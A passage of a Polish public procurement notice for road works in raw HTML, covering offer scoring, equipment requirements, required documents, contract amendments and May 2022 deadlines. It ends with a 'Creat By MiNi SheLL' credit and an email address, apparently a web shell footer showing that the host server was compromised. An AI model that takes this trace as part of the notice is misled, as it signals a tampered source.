Ø 500.<br/> 4.4.9 Inne prace i roboty niezbędne do prawidłowego wykonania przedmiotu umowy, w tym między innymi:<br/> 4.4.9.1 oznakowanie oraz zabezpieczenie terenu robót, <br/> 4.4.9.2 opracowanie projektu organizacji ruchu na czas prowadzenia robót (gdy wymagane),<br/> 4.4.9.3 organizację zaplecza,<br/> 4.4.9.4 organizację dojść i dojazdów do posesji w trakcie prowadzenia robót, <br/> 4.4.9.5 bieżący wywóz materiałów nieużytecznych,<br/> 4.4.9.6 wykonanie robót naprawczych infrastruktury technicznej, której stan techniczny na skutek realizacji robót uległ pogorszeniu, w tym robót odtworzeniowych.<br/> 4.5 Wszystkie wyżej wymienione roboty muszą być wykonywane zgodnie ze specyfikacją techniczną wykonania i odbioru robót.<br/> 4.6 Zamówienie zostanie udzielone po przeprowadzeniu procedury przewidzianej dla zamówienia z wolnej ręki, poprzedzone będzie stosownym zaproszeniem do negocjacji oraz negocjacjami.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.1 Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria przypisując im odpowiednią wagę punktową:<br/>Cena - 60 pkt<br/>Termin wykonania jednostkowego zlecenia - 40 pkt<br/>Wybrana zostanie oferta, która otrzyma największą ilość punktów obliczonych w sposób następujący:<br/>P = P1 + T1 <br/>gdzie:<br/>P – ogólna liczba punktów <br/>P1 - punkty otrzymane w kryterium „Cena” <br/>T1 - punkty otrzymane w kryterium „Termin wykonania jednostkowego zlecenia”<br/><br/> 19.2 Kryterium „Cena” będzie rozpatrywane na podstawie zadeklarowanej przez Wykonawcę w pkt 1 Formularza Ofertowego ceny za wykonanie przedmiotu zamówienia w zakresie objętym Specyfikacją Warunków Zamówienia. Punkty, które otrzyma oferta w kryterium „Cena” będą liczone wg wzoru:<br/> <br/> P1 = (najniższa zaoferowana cena spośród ofert ważnych/cena oferty badanej)*60 pkt<br/> <br/> 19.3 Kryterium „Termin wykonania jednostkowego zlecenia” będzie rozpatrywane na podstawie zadeklarowanych przez Wykonawcę w pkt 3 Formularza Ofertowego dni skrócenia terminu wykonania zlecenia. Punkty przyznawane za kryterium „Termin wykonania jednostkowego zlecenia” zostaną przydzielone w następujący sposób:<br/><br/>0 pkt – za wykonanie jednostkowego zlecenia w terminie 20 dni roboczych od daty otrzymania jednostkowego zlecenia <br/>15 pkt – za wykonanie jednostkowego zlecenia w terminie 15 dni roboczych od daty otrzymania jednostkowego zlecenia <br/>40 pkt – za wykonanie jednostkowego zlecenia w terminie 10 dni roboczych od daty otrzymania jednostkowego zlecenia <br/>Oferta wykonawcy, który nie poda terminu wykonania jednostkowego zlecenia lub zaoferuje termin wykonania jednostkowego zlecenia dłuższy niż 20 dni roboczych od daty otrzymania zlecenia - zostanie odrzucona.<br/> Ocena końcowa oferty to suma punktów uzyskanych przez ofertę w/g poszczególnych kryteriów.<br/> 19.4 Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów wynikającą z sumy punktów uzyskanych w poszczególnych kryteriach. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku. Wykonawca może uzyskać maksymalnie 100 pkt.<br/> 19.5 Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zgodnie z art. 248 ustawy Pzp wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną lub najniższym kosztem.<br/> 19.6 Jeżeli nie można dokonać wyboru oferty, w sposób o którym mowa powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę lub koszt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania jednostkowego zlecenia”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 16.1 O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych SWZ, oraz spełniają warunki udziału w postępowaniu, określone na podstawie art. 112 ustawy Pzp dotyczące;<br/> 16.1.1 zdolności do występowania w obrocie gospodarczym Opis sposobu dokonywania oceny spełnienia tego warunku: Zamawiający nie precyzuje wymagań w tym zakresie.<br/> 16.1.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. Opis sposobu dokonywania oceny spełnienia tego warunku: Zamawiający nie precyzuje wymagań w tym zakresie.<br/> 16.1.3 sytuacji ekonomicznej lub finansowej. Opis sposobu dokonywania oceny spełnienia tego warunku:<br/> 16.1.3.1 Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000,00 zł. <br/> 16.1.4 zdolności technicznej lub zawodowej. Opis sposobu dokonywania oceny spełnienia tego warunku:<br/> Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże na formularzu według wzoru jak w załączniku nr 4 do SWZ, że dysponuje sprzętem (tzn. ma zapewniony do niego dostęp przez dzierżawę, wynajem, kupno lub inny sposób) albo będzie nim dysponował, przedstawiając pisemne zobowiązanie innych podmiotów udostępniających sprzęt, który będzie uczestniczyć w wykonywaniu zamówienia, w tym.<br/> 16.1.4.1 koparko- ładowarka - 2 szt.<br/> 16.1.4.2 układarek lub równiarek do rozścielania tłucznia - 1 szt.,<br/> 16.1.4.3 przewoźne zbiorniki na wodę, wyposażone w urządzenia do rozpryskiwania wody -1 szt., <br/> 16.1.4.4 walce statyczne, gładkie lub ogumione, samojezdne lub doczepne, walce wibracyjne lub płytowe zagęszczarki wibracyjne - 1 szt. <br/> 16.1.4.5 ręczny sprzęt do drobnych robót naprawczych, jak łopaty, oskardy, ubijarki ręczne itp. <br/> 16.1.4.6 samochody samowyładowcze 6-12t - 2 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">17.2.1 dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia – potwierdzającego spełnienie warunku określonego w rozdziale 16 pkt. 16.1.3.1;<br/> 17.2.2 wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami potwierdzającego spełnienie warunku opisanego w rozdziale 16 pkt. 16.1.4 - wg wzoru stanowiącego załącznik nr 4 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 12.11 Oferta musi zawierać:<br/> 12.11.1 formularz ofertowy - według wzoru – załącznik nr 1 do SWZ;<br/> 12.11.2 oświadczenie wykonawcy o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu składane na podstawie art. 125 ust. 1 ustawy z dnia 11 września Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129 ze zm.) - według wzoru – załącznik nr 2 do SWZ;<br/> 12.11.3 pełnomocnictwo (jeżeli dotyczy) do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie określonej w pkt. 12.5 i 12.6;<br/> 12.11.4 jeżeli dotyczy - zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia – załącznik nr 7 do SWZ;<br/> 12.11.5 jeżeli dotyczy - oświadczenie podmiotu trzeciego udostępniającego zasoby wykonawcy o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu składane na podstawie art. 125 ust. 5 ustawy z dnia 11 września Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129 ze zm.) wg wzoru - załącznik nr 8 do SWZ;<br/> 12.11.6 jeżeli dotyczy - oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy z dnia 11 września Prawo zamówień publicznych (Dz. U. z 2021 r., poz. 1129 ze zm.) wg wzoru - załącznik nr 9 do SWZ;<br/> 12.11.7 kosztorys ofertowy uproszczony dla zakresu określonego w Przedmiarze robót stanowiący załącznik nr 3 do SWZ, sporządzony zgodnie z zapisami w dziale 18 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 16.4 Informacja dla wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/> 16.4.1 Zgodnie z art. 58 ustawy Pzp Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/> 16.4.2 Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/> 16.4.3 W odniesieniu do wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a) Wszelkie zmiany i uzupełnienia treści niniejszej umowy wymagają formy pisemnej pod rygorem ich<br/>nieważności.<br/>b) Strony dopuszczają wprowadzenie do treści niniejszej umowy istotnych zmian jej postanowień w<br/>stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy. Zmiany te mogą<br/>dotyczyć między innymi:<br/>1) terminu wykonania przedmiotu umowy w przypadku:<br/>a) wystąpienia korzystnych lub niekorzystnych warunków atmosferycznych,<br/>b) zwiększenia lub zmniejszenia się w związku z warunkami atmosferycznymi potrzeb<br/>Zamawiającego w stosunku do pierwotnie zakładanych,<br/>c) wystąpienia klęsk żywiołowych lub niekorzystnych warunków atmosferycznych<br/>uniemożliwiających prawidłowe wykonanie robót bądź dostaw, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów lub z przyczyn technologicznych powodujących<br/>konieczność całkowitego przerwania prac, co zostanie potwierdzone przez Zamawiającego,<br/>d) wystąpienia konieczności wykonania zamówień dodatkowych niezbędnych do prawidłowego<br/>wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek<br/>sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji robót<br/>bądź dostaw,<br/>e) niemożności wykonywania robót bądź dostaw, gdy zmiana przepisów prawa nie dopuszcza<br/>do wykonania robót bądź dostaw lub nakazuje wstrzymanie robót bądź dostaw z przyczyn<br/>niezawinionych przez Wykonawcę,<br/>f) podjęcie przez osoby trzecie działań uniemożliwiających lub utrudniających wykonanie<br/>przedmiotu umowy w sposób przewidziany w Specyfikacji Technicznej, które to działania nie są<br/>konsekwencją winy którejkolwiek ze stron umowy,<br/>g) wystąpienia okoliczności wskazanych w pkt. 2 i 3.<br/>2) sposobu wykonania przedmiotu umowy w przypadku :<br/>a) niedostępności na rynku materiałów lub urządzeń wskazanych w Specyfikacji Technicznej<br/>spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,<br/>b) pojawienia się na rynku materiałów lub urządzeń nowszej generacji, pozwalających<br/>na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego<br/>przedmiotu umowy, lub umożliwiających uzyskanie lepszej jakości robót bądź dostaw,<br/>c) pojawienia się nowszej technologii wykonania robót, pozwalającej na zaoszczędzenie czasu<br/>realizacji przedmiotu umowy lub kosztów wykonywanych prac, jak również kosztów eksploatacji<br/>wykonanego przedmiotu umowy,<br/>d) celowości lub konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych<br/>rozwiązań technicznych, technologicznych lub materiałowych niż wskazane w Specyfikacji<br/>Technicznej,<br/>e) wystąpienia warunków geologicznych, wodnych odbiegających w sposób istotny od przyjętych w<br/>Specyfikacji Technicznej,<br/>f) wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne<br/>podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,<br/>g) podjęcia przez osoby trzecie działań uniemożliwiających lub utrudniających wykonanie<br/>przedmiotu umowy w sposób przewidziany w Specyfikacji Technicznej, które to działania nie są<br/>konsekwencją winy którejkolwiek ze stron umowy,<br/>h) zasadności zmiany ustalonych zakresów realizacyjnych i innych warunków wykonania<br/>przedmiotu umowy w przypadku wystąpienia okoliczności uzasadniających taką zmianę, których nie można było przewidzieć.<br/>i) zasadności zmiany ustalonych zakresów i innych warunków wykonania przedmiotu umowy w<br/>przypadku wystąpienia okoliczności uzasadniających taką zmianę, których nie można było<br/>przewidzieć.<br/>3) zmiany zakresu przedmiotu umowy w przypadku:<br/>a) podjęcia przez osoby trzecie działań uniemożliwiających lub utrudniających wykonanie<br/>przedmiotu umowy w zakresie przewidzianym w Specyfikacji Technicznej, które to działania nie<br/>są konsekwencją winy którejkolwiek ze stron umowy,<br/>..... Z uwagi na ograniczoną liczbę znaków pełna treść znajduje się w projekcie umowy stanowiącym załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-27 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-27 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-25</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania Wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. 2022 r. poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com